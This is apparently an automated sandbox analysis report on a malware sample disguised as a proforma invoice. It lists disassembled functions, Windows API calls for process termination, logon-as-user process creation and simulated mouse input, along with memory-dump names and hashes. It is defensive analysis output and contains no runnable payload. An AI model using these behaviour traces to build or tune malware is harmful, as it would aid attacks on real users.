• Instruction Fuzzy Hash: D541CF30611301EFD721DF24DC88FBA7BE8EB49325F044669F9A5872A1C7309C69DB65
APIs
• ShowWindow.USER32(003157B0,00000000,00C26378,?,?,003157B0,?,002DB5A8,?,?), ref: 002DB712
• EnableWindow.USER32(00000000,00000000), ref: 002DB736
• ShowWindow.USER32(003157B0,00000000,00C26378,?,?,003157B0,?,002DB5A8,?,?), ref: 002DB796
• ShowWindow.USER32(00000000,00000004,?,002DB5A8,?,?), ref: 002DB7A8
• EnableWindow.USER32(00000000,00000001), ref: 002DB7CC
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 002DB7EF
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: 8d19ec214c2f86cb1ea7771e899cc73b63d40e0bc253ed2d65c69af6e6f556ea
• Instruction ID: c960cc68a1ddb6aa0b5347fa4f33061c051d22d19ca89cd53fe2977bb9cd8c34
• Opcode Fuzzy Hash: 8d19ec214c2f86cb1ea7771e899cc73b63d40e0bc253ed2d65c69af6e6f556ea
• Instruction Fuzzy Hash: C4419135601241EFEB22CF24C5A9B94BBE0FF45310F1941BAE9598F7A2C731AC66CB50
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,002C4E41,?,?,00000000,00000001), ref: 002C70AC
  • Part of subcall function 002C39A0: GetWindowRect.USER32(?,?), ref: 002C39B3
• GetDesktopWindow.USER32 ref: 002C70D6
• GetWindowRect.USER32(00000000), ref: 002C70DD
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 002C710F
  • Part of subcall function 002B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B52BC
• GetCursorPos.USER32(?), ref: 002C713B
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002C7199
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
• Opcode ID: c2e5ab67ec11b5362e5ad87c07e7392d809fd39722aae57d0782c7419e7f3f3b
• Instruction ID: 171b5e2d6b1542c28f207115784257fdb265bb3225ebb143289242533de0fc5a
• Opcode Fuzzy Hash: c2e5ab67ec11b5362e5ad87c07e7392d809fd39722aae57d0782c7419e7f3f3b
• Instruction Fuzzy Hash: 1B31E172509306ABD720DF14D849F9BB7E9FB88314F040A1AF98997191C670EA18CF96
APIs
  • Part of subcall function 002A80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002A80C0
  • Part of subcall function 002A80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002A80CA
  • Part of subcall function 002A80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002A80D9
  • Part of subcall function 002A80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002A80E0
  • Part of subcall function 002A80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002A80F6
• GetLengthSid.ADVAPI32(?,00000000,002A842F), ref: 002A88CA
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 002A88D6
• HeapAlloc.KERNEL32(00000000), ref: 002A88DD
• CopySid.ADVAPI32(00000000,00000000,?), ref: 002A88F6
• GetProcessHeap.KERNEL32(00000000,00000000,002A842F), ref: 002A890A
• HeapFree.KERNEL32(00000000), ref: 002A8911
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
• Opcode ID: 083b114b9cb70c789b518ab7e616721966c1031f233da16946e5c06dc0a85d00
• Instruction ID: d853bbdcf565f8f558400078712e14031a1e056b535e26557866a23de2d5fe56
• Opcode Fuzzy Hash: 083b114b9cb70c789b518ab7e616721966c1031f233da16946e5c06dc0a85d00
• Instruction Fuzzy Hash: 7011AF7192220AFFDB509FA4DD09BBF7778EB46311F148029E84697210CF369E24DB60
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002A85E2
• OpenProcessToken.ADVAPI32(00000000), ref: 002A85E9
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 002A85F8
• CloseHandle.KERNEL32(00000004), ref: 002A8603
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002A8632
• DestroyEnvironmentBlock.USERENV(00000000), ref: 002A8646
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: 480d3f20842d93a19eb900bbe48e8ebc86c02ef720ad4b8d889015d922733727
• Instruction ID: 588d4b51d456f393920e2604bebaa7e1daa92af254920b7786420840f90b4441
• Opcode Fuzzy Hash: 480d3f20842d93a19eb900bbe48e8ebc86c02ef720ad4b8d889015d922733727
• Instruction Fuzzy Hash: BD117F7290124EABEF01CFA4ED49FDE7BA9EF09704F044065FE05A2160CB718D60DB60
APIs
• GetDC.USER32(00000000), ref: 002AB7B5
• GetDeviceCaps.GDI32(00000000,00000058), ref: 002AB7C6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 002AB7CD
• ReleaseDC.USER32(00000000,00000000), ref: 002AB7D5
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 002AB7EC
• MulDiv.KERNEL32(000009EC,?,?), ref: 002AB7FE
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: 313a56193e369a12ee1974f735f582816c84192ac97c30494177dffcb8e69159
• Instruction ID: 7d2e9d9cc27edd84c377be9ca37133405d9d55cd28c3a8fe109091b58640023c
• Opcode Fuzzy Hash: 313a56193e369a12ee1974f735f582816c84192ac97c30494177dffcb8e69159
• Instruction Fuzzy Hash: 8901A775E01309BBEF109FB69D49A5EBFB8EB49311F008076FA08A7291DA709D10CF94
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00270193
• MapVirtualKeyW.USER32(00000010,00000000), ref: 0027019B
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 002701A6
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 002701B1
• MapVirtualKeyW.USER32(00000011,00000000), ref: 002701B9
• MapVirtualKeyW.USER32(00000012,00000000), ref: 002701C1
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: 6b4f097703683ffe54cbce7cee516c31c78cee4b11d62b66a3019bb501dbc2d6
• Instruction ID: 5ad20d3ca3b6f2223a3b3cb509e65e079b15f9a2dbdd5fe6d463a9155618187d
• Opcode Fuzzy Hash: 6b4f097703683ffe54cbce7cee516c31c78cee4b11d62b66a3019bb501dbc2d6
• Instruction Fuzzy Hash: 8B0148B09027597DE3008F5A8C85A52FFA8FF19354F00411BA15847941C7B5A864CBE5
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002B53F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002B540F
• GetWindowThreadProcessId.USER32(?,?), ref: 002B541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002B542D
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002B5437
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002B543E
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: caae28fcb469c5966c1376310fc3995ef8162698c8232ee2801e1b2f1c142648
• Instruction ID: e1f4c652e98eb7a841d0453456f0078369a5de544fd4c2cffe731c863ddbb967
• Opcode Fuzzy Hash: caae28fcb469c5966c1376310fc3995ef8162698c8232ee2801e1b2f1c142648
• Instruction Fuzzy Hash: 33F06231542158BBD3605B52AD0DEEB7B7CEBC6B11F04016AF915D105096A05E0186B9
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 002B7243
• EnterCriticalSection.KERNEL32(?,?,00260EE4,?,?), ref: 002B7254
• TerminateThread.KERNEL32(00000000,000001F6,?,00260EE4,?,?), ref: 002B7261
• WaitForSingleObject.KERNEL32(00000000,000003E8,?,00260EE4,?,?), ref: 002B726E
  • Part of subcall function 002B6C35: CloseHandle.KERNEL32(00000000,?,002B727B,?,00260EE4,?,?), ref: 002B6C3F
• InterlockedExchange.KERNEL32(?,000001F6), ref: 002B7281
• LeaveCriticalSection.KERNEL32(?,?,00260EE4,?,?), ref: 002B7288
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: fc76a081231791a7e6621c7979c91d4c43c26832b68be11c1f8ab8a9562f58c3
• Instruction ID: 6e47a3fd5615cebc83bb41971c094164e79bad8a846988d5e4ce3f65ee6e749f
• Opcode Fuzzy Hash: fc76a081231791a7e6621c7979c91d4c43c26832b68be11c1f8ab8a9562f58c3
• Instruction Fuzzy Hash: 8FF05E36942612EBD7912F64FE4CADA7729EF45702B100533F943910A0CB765D11CB54
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 002A899D
• UnloadUserProfile.USERENV(?,?), ref: 002A89A9
• CloseHandle.KERNEL32(?), ref: 002A89B2
• CloseHandle.KERNEL32(?), ref: 002A89BA
• GetProcessHeap.KERNEL32(00000000,?), ref: 002A89C3
• HeapFree.KERNEL32(00000000), ref: 002A89CA
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: d835e135be6aad7ff31c84b58415485df6a29cd5dad537c2360b155505ee9006
• Instruction ID: 2c5f7004c80368be5aaae94cdaa003d7457b9ff3ad298adda50b190ed230e6b5
• Opcode Fuzzy Hash: d835e135be6aad7ff31c84b58415485df6a29cd5dad537c2360b155505ee9006
• Instruction Fuzzy Hash: 64E0C236505001FBDA812FE5FE0C94ABB69FB89322B108232F21A81170CB329820DB58
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,002E2C7C,?), ref: 002A76EA
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,002E2C7C,?), ref: 002A7702
• CLSIDFromProgID.OLE32(?,?,00000000,002DFB80,000000FF,?,00000000,00000800,00000000,?,002E2C7C,?), ref: 002A7727
• _memcmp.LIBCMT ref: 002A7748
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                                    • String ID: ,,.
                                                                                                                    • API String ID: 314563124-737214711
                                                                                                                    • Opcode ID: 1c1aeb8c79722f156869056637c753e28cd8e7ec8b3f271ccd3b61b227e47b67
                                                                                                                    • Instruction ID: bf32499fd572683b9312d79e7941adde28a354a86976aed4996bddd6ed65c87e
                                                                                                                    • Opcode Fuzzy Hash: 1c1aeb8c79722f156869056637c753e28cd8e7ec8b3f271ccd3b61b227e47b67
                                                                                                                    • Instruction Fuzzy Hash: 82812E71A1010AEFCB04DFA4CD84EEEB7B9FF89315F204599E506AB250DB71AE05CB64
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 002C8613
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 002C8722
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 002C889A
                                                                                                                      • Part of subcall function 002B7562: VariantInit.OLEAUT32(00000000), ref: 002B75A2
                                                                                                                      • Part of subcall function 002B7562: VariantCopy.OLEAUT32(00000000,?), ref: 002B75AB
                                                                                                                      • Part of subcall function 002B7562: VariantClear.OLEAUT32(00000000), ref: 002B75B7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                    • API String ID: 4237274167-1221869570
                                                                                                                    • Opcode ID: e4ee74e2921f89ab9ae02c5e3d1801f82e5d5e1f347222629794f48549fe875d
                                                                                                                    • Instruction ID: 53ca1c5788a5f3dac1f04a50b6505b92bc13760cc118af904ed5d41608205969
                                                                                                                    • Opcode Fuzzy Hash: e4ee74e2921f89ab9ae02c5e3d1801f82e5d5e1f347222629794f48549fe875d
                                                                                                                    • Instruction Fuzzy Hash: C49159746243059FC710DF24C484E6AB7E4EF89714F148A6EF88A8B361DB31E959CF92
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0026FC86: _wcscpy.LIBCMT ref: 0026FCA9
                                                                                                                    • _memset.LIBCMT ref: 002B2B87
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002B2BB6
                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002B2C69
                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002B2C97
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 4152858687-4108050209
                                                                                                                    • Opcode ID: 9c919bdfe23a62bb2723125ea40738435734022830e84b74f4344cb8e246baf4
                                                                                                                    • Instruction ID: d4e41b3ae737b38016514d22a110ee0fc8784a480ea7d789e8adb8644f03b8be
                                                                                                                    • Opcode Fuzzy Hash: 9c919bdfe23a62bb2723125ea40738435734022830e84b74f4344cb8e246baf4
                                                                                                                    • Instruction Fuzzy Hash: 5951C271528302DBD7259F24D8456AF7BE8EF89390F04492EF895D3191DB70CD688B92
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_free
                                                                                                                    • String ID: 3c&$_&
                                                                                                                    • API String ID: 2620147621-1388094336
                                                                                                                    • Opcode ID: 49ff97a8a434d133b73f820ea13ed0397ec9457ae9619accc8d58a23ccc0e385
                                                                                                                    • Instruction ID: c74e9dcd5b1bf20f5aeb5170492256f9ec8dc6cea1ff9affe15e2aac02b51b84
                                                                                                                    • Opcode Fuzzy Hash: 49ff97a8a434d133b73f820ea13ed0397ec9457ae9619accc8d58a23ccc0e385
                                                                                                                    • Instruction Fuzzy Hash: 92515B716243428FDB25CF28C880B6ABBE5FF85314F04882DE98997351DB31E965CF82
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$_memmove
                                                                                                                    • String ID: 3c&$ERCP
                                                                                                                    • API String ID: 2532777613-1111993731
                                                                                                                    • Opcode ID: 9cea33ef7d5ce2d328aacf033f55d7ab9d3ed3c7d5d3ed49ccb8b85d5bb9be88
                                                                                                                    • Instruction ID: 0a722adfc43d5916fa079c6a271281cc46863b62b7c10837a7a1b074c9c47fef
                                                                                                                    • Opcode Fuzzy Hash: 9cea33ef7d5ce2d328aacf033f55d7ab9d3ed3c7d5d3ed49ccb8b85d5bb9be88
                                                                                                                    • Instruction Fuzzy Hash: 9951C371920706DFDB24CF65C895BAAB7F4EF44704F20856EE94AC7291E770EAA4CB40
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002B27C0
                                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 002B27DC
                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 002B2822
                                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00315890,00000000), ref: 002B286B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1173514356-4108050209
                                                                                                                    • Opcode ID: 0b7540681e32c89e1ddb60029de120dc1b975394365f38502369b4fb4c59c3d8
                                                                                                                    • Instruction ID: e1e2f5b13f2d5680518e152f9f199c15b84f23dc24837ac0bc0770bdaf3dd093
                                                                                                                    • Opcode Fuzzy Hash: 0b7540681e32c89e1ddb60029de120dc1b975394365f38502369b4fb4c59c3d8
                                                                                                                    • Instruction Fuzzy Hash: 2B41B270614302DFD720DF24DC48B9ABBE8EF85354F044A6DF96697292D730E919CB62
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 002CD7C5
                                                                                                                      • Part of subcall function 0025784B: _memmove.LIBCMT ref: 00257899
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharLower_memmove
                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                    • API String ID: 3425801089-567219261
                                                                                                                    • Opcode ID: ecbd155639b0ae101ceb07732ba90417d134a7f997677f3f9028cbc9cbce2e57
                                                                                                                    • Instruction ID: baf81812e3c7ebd64ac43971174333e5a961fe4b984164b2eb6df75700ebb2d3
                                                                                                                    • Opcode Fuzzy Hash: ecbd155639b0ae101ceb07732ba90417d134a7f997677f3f9028cbc9cbce2e57
